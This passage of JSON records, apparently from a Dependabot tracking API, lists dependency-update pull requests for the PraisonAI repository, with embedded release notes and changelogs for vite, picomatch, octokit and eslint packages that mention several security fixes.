href=\"https://github.com/pillarjs/path-to-regexp/commit/8881a88930cf96ebaa00412a8e87cdd601bb3f3d\"\u003e\u003ccode\u003e8881a88\u003c/code\u003e\u003c/a\u003e Byte optimization (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/423\"\u003e#423\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/43669ac637fe70fad33693d145a74d98179152ce\"\u003e\u003ccode\u003e43669ac\u003c/code\u003e\u003c/a\u003e Dedupe regex prefixes (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/422\"\u003e#422\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v8.2.0...v8.4.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `picomatch` from 2.3.1 to 2.3.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/picomatch/releases\"\u003epicomatch's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.3.2\u003c/h2\u003e\n\u003cp\u003eThis is a security release fixing several security relevant issues.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: exception when glob pattern contains constructor by \u003ca href=\"https://github.com/Jason3S\"\u003e\u003ccode\u003e@​Jason3S\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/micromatch/picomatch/pull/144\"\u003emicromatch/picomatch#144\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj\"\u003eCVE-2026-33671\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p\"\u003eCVE-2026-33672\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\"\u003ehttps://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/picomatch/blob/master/CHANGELOG.md\"\u003epicomatch's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease history\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eAll notable changes to this project will be documented in this file.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eThe format is based on \u003ca href=\"http://keepach...\n\n_Description has been truncated_","html_url":"https://github.com/MervinPraison/PraisonAI/pull/1232","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/MervinPraison%2FPraisonAI/issues/1232","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/1232/packages"},{"uuid":"4139904406","node_id":"PR_kwDOOE7T7M7NjOXa","number":27,"state":"closed","title":"Bump the npm_and_yarn group across 1 directory with 16 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-03-26T02:15:02.000Z","author_association":null,"state_reason":null,"created_at":"2026-03-26T02:14:54.000Z","updated_at":"2026-03-26T02:15:11.000Z","time_to_close":8,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"npm_and_yarn","update_count":16,"packages":[{"name":"vite","old_version":"5.4.14","new_version":"5.4.21","repository_url":"https://github.com/vitejs/vite"},{"name":"@eslint/plugin-kit","old_version":"0.2.7","new_version":"0.2.8","repository_url":"https://github.com/eslint/rewrite"},{"name":"@octokit/plugin-paginate-rest","old_version":"9.1.5","new_version":"9.2.2","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"},{"name":"@octokit/request-error","old_version":"5.0.1","new_version":"5.1.1","repository_url":"https://github.com/octokit/request-error.js"},{"name":"@octokit/request","old_version":"8.1.6","new_version":"8.4.1","repository_url":"https://github.com/octokit/request.js"},{"name":"ajv","old_version":"6.12.6","new_version":"6.14.0","repository_url":"https://github.com/ajv-validator/ajv"},{"name":"brace-expansion","old_version":"1.1.11","new_version":"1.1.12","repository_url":"https://github.com/juliangruber/brace-expansion"},{"name":"flatted","old_version":"3.2.9","new_version":"3.4.2","repository_url":"https://github.com/WebReflection/flatted"},{"name":"glob","old_version":"10.4.5","new_version":"10.5.0","repository_url":"https://github.com/isaacs/node-glob"},{"name":"js-yaml","old_version":"4.1.0","new_version":"4.1.1","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"lodash","old_version":"4.17.21","new_version":"4.17.23","repository_url":"https://github.com/lodash/lodash"},{"name":"minimatch","old_version":"3.1.2","new_version":"3.1.5","repository_url":"https://github.com/isaacs/minimatch"},{"name":"picomatch","old_version":"2.3.1","new_version":"2.3.2","repository_url":"https://github.com/micromatch/picomatch"},{"name":"undici","old_version":"5.28.3","new_version":"5.29.0","repository_url":"https://github.com/nodejs/undici"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 14 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite) | `5.4.14` | `5.4.21` |\n| [@eslint/plugin-kit](https://github.com/eslint/rewrite/tree/HEAD/packages/plugin-kit) | `0.2.7` | `0.2.8` |\n| [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js) | `9.1.5` | `9.2.2` |\n| [@octokit/request-error](https://github.com/octokit/request-error.js) | `5.0.1` | `5.1.1` |\n| [@octokit/request](https://github.com/octokit/request.js) | `8.1.6` | `8.4.1` |\n| [ajv](https://github.com/ajv-validator/ajv) | `6.12.6` | `6.14.0` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.11` | `1.1.12` |\n| [flatted](https://github.com/WebReflection/flatted) | `3.2.9` | `3.4.2` |\n| [glob](https://github.com/isaacs/node-glob) | `10.4.5` | `10.5.0` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `4.1.0` | `4.1.1` |\n| [lodash](https://github.com/lodash/lodash) | `4.17.21` | `4.17.23` |\n| [minimatch](https://github.com/isaacs/minimatch) | `3.1.2` | `3.1.5` |\n| [picomatch](https://github.com/micromatch/picomatch) | `2.3.1` | `2.3.2` |\n| [undici](https://github.com/nodejs/undici) | `5.28.3` | `5.29.0` |\n\n\nUpdates `vite` from 5.4.14 to 5.4.21\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vitejs/vite/releases\"\u003evite's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.4.21\u003c/h2\u003e\n\u003cp\u003ePlease refer to \u003ca href=\"https://github.com/vitejs/vite/blob/v5.4.21/packages/vite/CHANGELOG.md\"\u003eCHANGELOG.md\u003c/a\u003e for details.\u003c/p\u003e\n\u003ch2\u003ev5.4.20\u003c/h2\u003e\n\u003cp\u003ePlease refer to \u003ca href=\"https://github.com/vitejs/vite/blob/ca88ed7398288ce0c60176ac9a6392f10654c67c/packages/vite/CHANGELOG.md\"\u003eCHANGELOG.md\u003c/a\u003e for details.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vitejs/vite/blob/v5.4.21/packages/vite/CHANGELOG.md\"\u003evite's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e5.4.21 (2025-10-20)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(dev): trim trailing slash before \u003ccode\u003eserver.fs.deny\u003c/code\u003e check (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/20968\"\u003e#20968\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/20970\"\u003e#20970\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/cad1d31d0635dd8fd4ddfe6e5a92eb9ff13cd06c\"\u003ecad1d31\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/20968\"\u003e#20968\u003c/a\u003e \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/20970\"\u003e#20970\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: update CHANGELOG (\u003ca href=\"https://github.com/vitejs/vite/commit/ca88ed7398288ce0c60176ac9a6392f10654c67c\"\u003eca88ed7\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e5.4.20 (2025-09-08)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: apply \u003ccode\u003efs.strict\u003c/code\u003e check to HTML files (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/20736\"\u003e#20736\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/482000f57f56fe6ff2e905305100cfe03043ddea\"\u003e482000f\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/20736\"\u003e#20736\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: port sirv@3.0.2 changes to sirv@2.0.4 (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/20737\"\u003e#20737\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/4f1c35bcbb5830290c694aa14b6789e07450f069\"\u003e4f1c35b\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/20737\"\u003e#20737\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e5.4.19 (2025-04-30)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19965\"\u003e#19965\u003c/a\u003e, check static serve file inside sirv (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19966\"\u003e#19966\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/766947e7cbf1cdd07df9737394e8c870401b78b0\"\u003e766947e\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19965\"\u003e#19965\u003c/a\u003e \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19966\"\u003e#19966\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e5.4.18 (2025-04-10)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19830\"\u003e#19830\u003c/a\u003e, reject requests with \u003ccode\u003e#\u003c/code\u003e in request-target (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19831\"\u003e#19831\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/823675baff2bd6809c74ba2d9acca0327923a54f\"\u003e823675b\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19830\"\u003e#19830\u003c/a\u003e \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19831\"\u003e#19831\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e5.4.17 (2025-04-03)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19782\"\u003e#19782\u003c/a\u003e, fs check with svg and relative paths (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19784\"\u003e#19784\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/84b2b46ed129be8215108e789a90adbb33a9c42c\"\u003e84b2b46\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19782\"\u003e#19782\u003c/a\u003e \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19784\"\u003e#19784\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e5.4.16 (2025-03-31)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19761\"\u003e#19761\u003c/a\u003e, fs check in transform middleware (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19762\"\u003e#19762\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/b627c50d359f3bd9b602408fbbf462cf4a2f019c\"\u003eb627c50\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19761\"\u003e#19761\u003c/a\u003e \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19762\"\u003e#19762\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e5.4.15 (2025-03-24)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19702\"\u003e#19702\u003c/a\u003e, fs raw query with query separators (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19703\"\u003e#19703\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/807d7f06d33ab49c48a2a3501da3eea1906c0d41\"\u003e807d7f0\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19702\"\u003e#19702\u003c/a\u003e \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19703\"\u003e#19703\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/adce3c22c64cc9d44cc8f45cc92b543e3e4bf385\"\u003e\u003ccode\u003eadce3c2\u003c/code\u003e\u003c/a\u003e release: v5.4.21\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/cad1d31d0635dd8fd4ddfe6e5a92eb9ff13cd06c\"\u003e\u003ccode\u003ecad1d31\u003c/code\u003e\u003c/a\u003e fix(dev): trim trailing slash before \u003ccode\u003eserver.fs.deny\u003c/code\u003e check (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/20968\"\u003e#20968\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/20970\"\u003e#20970\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/ca88ed7398288ce0c60176ac9a6392f10654c67c\"\u003e\u003ccode\u003eca88ed7\u003c/code\u003e\u003c/a\u003e chore: update CHANGELOG\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/997700f01c7199daf7330d33a7fd3a43b2e9e3ba\"\u003e\u003ccode\u003e997700f\u003c/code\u003e\u003c/a\u003e release: v5.4.20\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/482000f57f56fe6ff2e905305100cfe03043ddea\"\u003e\u003ccode\u003e482000f\u003c/code\u003e\u003c/a\u003e fix: apply \u003ccode\u003efs.strict\u003c/code\u003e check to HTML files (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/20736\"\u003e#20736\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/80a333a23103ced0442d4463d1191433d90f5e19\"\u003e\u003ccode\u003e80a333a\u003c/code\u003e\u003c/a\u003e release: v5.4.19\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/766947e7cbf1cdd07df9737394e8c870401b78b0\"\u003e\u003ccode\u003e766947e\u003c/code\u003e\u003c/a\u003e fix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19965\"\u003e#19965\u003c/a\u003e, check static serve file inside sirv (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19966\"\u003e#19966\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/731b77d19d36f5682a5441b49cb2f6473389ad99\"\u003e\u003ccode\u003e731b77d\u003c/code\u003e\u003c/a\u003e release: v5.4.18\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/823675baff2bd6809c74ba2d9acca0327923a54f\"\u003e\u003ccode\u003e823675b\u003c/code\u003e\u003c/a\u003e fix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19830\"\u003e#19830\u003c/a\u003e, reject requests with \u003ccode\u003e#\u003c/code\u003e in request-target (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19831\"\u003e#19831\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/0a2518a98d2354c61ee8ef51f7d00fa92aebb511\"\u003e\u003ccode\u003e0a2518a\u003c/code\u003e\u003c/a\u003e release: v5.4.17\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/vitejs/vite/commits/v5.4.21/packages/vite\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@eslint/plugin-kit` from 0.2.7 to 0.2.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/eslint/rewrite/releases\"\u003e\u003ccode\u003e@​eslint/plugin-kit\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eplugin-kit: v0.2.8\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/eslint/rewrite/compare/plugin-kit-v0.2.7...plugin-kit-v0.2.8\"\u003e0.2.8\u003c/a\u003e (2025-04-01)\u003c/h2\u003e\n\u003ch3\u003eDependencies\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eThe following workspace dependencies were updated\n\u003cul\u003e\n\u003cli\u003edependencies\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​eslint/core\u003c/code\u003e bumped from ^0.12.0 to ^0.13.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/eslint/rewrite/blob/main/packages/plugin-kit/CHANGELOG.md\"\u003e\u003ccode\u003e@​eslint/plugin-kit\u003c/code\u003e's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/eslint/rewrite/compare/plugin-kit-v0.2.7...plugin-kit-v0.2.8\"\u003e0.2.8\u003c/a\u003e (2025-04-01)\u003c/h2\u003e\n\u003ch3\u003eDependencies\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eThe following workspace dependencies were updated\n\u003cul\u003e\n\u003cli\u003edependencies\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​eslint/core\u003c/code\u003e bumped from ^0.12.0 to ^0.13.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eslint/rewrite/commit/1615a01d9e5c637dfb4d19bb53968185462fadb3\"\u003e\u003ccode\u003e1615a01\u003c/code\u003e\u003c/a\u003e chore: release main (\u003ca href=\"https://github.com/eslint/rewrite/tree/HEAD/packages/plugin-kit/issues/174\"\u003e#174\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eslint/rewrite/commit/6199b6e3fa80aea5df2730f75f88e462eb49cd17\"\u003e\u003ccode\u003e6199b6e\u003c/code\u003e\u003c/a\u003e docs: Update README sponsors\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eslint/rewrite/commit/1f9c609c2d5312c285b552225da249fc42ca4654\"\u003e\u003ccode\u003e1f9c609\u003c/code\u003e\u003c/a\u003e docs: Update README sponsors\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eslint/rewrite/commit/473c9629359b08818af5ee21a17bd21db5dcc478\"\u003e\u003ccode\u003e473c962\u003c/code\u003e\u003c/a\u003e docs: Update README sponsors\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eslint/rewrite/commit/a48aa6ac192f1c2d1fd9a1ed396a57919b24a25e\"\u003e\u003ccode\u003ea48aa6a\u003c/code\u003e\u003c/a\u003e docs: Update README sponsors\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eslint/rewrite/commit/49d1d2009cb3a2583e6214cd931d0e6b87cb034c\"\u003e\u003ccode\u003e49d1d20\u003c/code\u003e\u003c/a\u003e docs: Update README sponsors\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/eslint/rewrite/commits/plugin-kit-v0.2.8/packages/plugin-kit\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/plugin-paginate-rest` from 9.1.5 to 9.2.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/releases\"\u003e\u003ccode\u003e@​octokit/plugin-paginate-rest\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev9.2.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.2.1...v9.2.2\"\u003e9.2.2\u003c/a\u003e (2025-02-15)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/660\"\u003e#660\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/e1e44898cf1870f1496ae7f5b2a4476c71044e6b\"\u003ee1e4489\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev9.2.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.2.0...v9.2.1\"\u003e9.2.1\u003c/a\u003e (2024-03-01)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003epkg:\u003c/strong\u003e pin \u003ccode\u003e@octokit/core\u003c/code\u003e peerDependency to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/599\"\u003e#599\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/5b84386830ebfe873f4ab7e106cc33eec6a2ace7\"\u003e5b84386\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev9.2.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.1.5...v9.2.0\"\u003e9.2.0\u003c/a\u003e (2024-02-22)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003enew \u003ccode\u003e/orgs/{org}/organization-roles/{role_id}/teams\u003c/code\u003e and \u003ccode\u003e/orgs/{org}/organization-roles/{role_id}/users\u003c/code\u003e endpoints (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/594\"\u003e#594\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/75aeaafae8b52afe744958075d95111f37343093\"\u003e75aeaaf\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/e1e44898cf1870f1496ae7f5b2a4476c71044e6b\"\u003e\u003ccode\u003ee1e4489\u003c/code\u003e\u003c/a\u003e fix: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/660\"\u003e#660\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/5b84386830ebfe873f4ab7e106cc33eec6a2ace7\"\u003e\u003ccode\u003e5b84386\u003c/code\u003e\u003c/a\u003e fix(pkg): pin \u003ccode\u003e@octokit/core\u003c/code\u003e peerDependency to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/599\"\u003e#599\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/fa01f94c624b3b67f6ef687c80865773a1c99676\"\u003e\u003ccode\u003efa01f94\u003c/code\u003e\u003c/a\u003e ci(action): update actions/add-to-project action to v0.6.0 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/598\"\u003e#598\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/75aeaafae8b52afe744958075d95111f37343093\"\u003e\u003ccode\u003e75aeaaf\u003c/code\u003e\u003c/a\u003e feat: new \u003ccode\u003e/orgs/{org}/organization-roles/{role_id}/teams\u003c/code\u003e and `/orgs/{org}/o...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/54d6bcfef756e5b329d817ce5ad3f92885a00a7d\"\u003e\u003ccode\u003e54d6bcf\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency prettier to v3.2.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/1bfa2f8d338158db33af812168bbfad9d8af4f00\"\u003e\u003ccode\u003e1bfa2f8\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency npm-run-all2 to v6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/eb4a8fe643a368ef3d68f8901d551638230581e1\"\u003e\u003ccode\u003eeb4a8fe\u003c/code\u003e\u003c/a\u003e chore(deps): replace dependency npm-run-all with npm-run-all2 ^5.0.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/11ef7798c8519e8446a92605d4e4bd2008a42c07\"\u003e\u003ccode\u003e11ef779\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency esbuild to ^0.20.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/2b6cc98c51e0816a2873ea5d6e6b4edb01d2e9b9\"\u003e\u003ccode\u003e2b6cc98\u003c/code\u003e\u003c/a\u003e ci(action): update peter-evans/create-or-update-comment action to v4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/d7c9de5bb0366b61666c1270138ce93059c3402a\"\u003e\u003ccode\u003ed7c9de5\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency prettier to 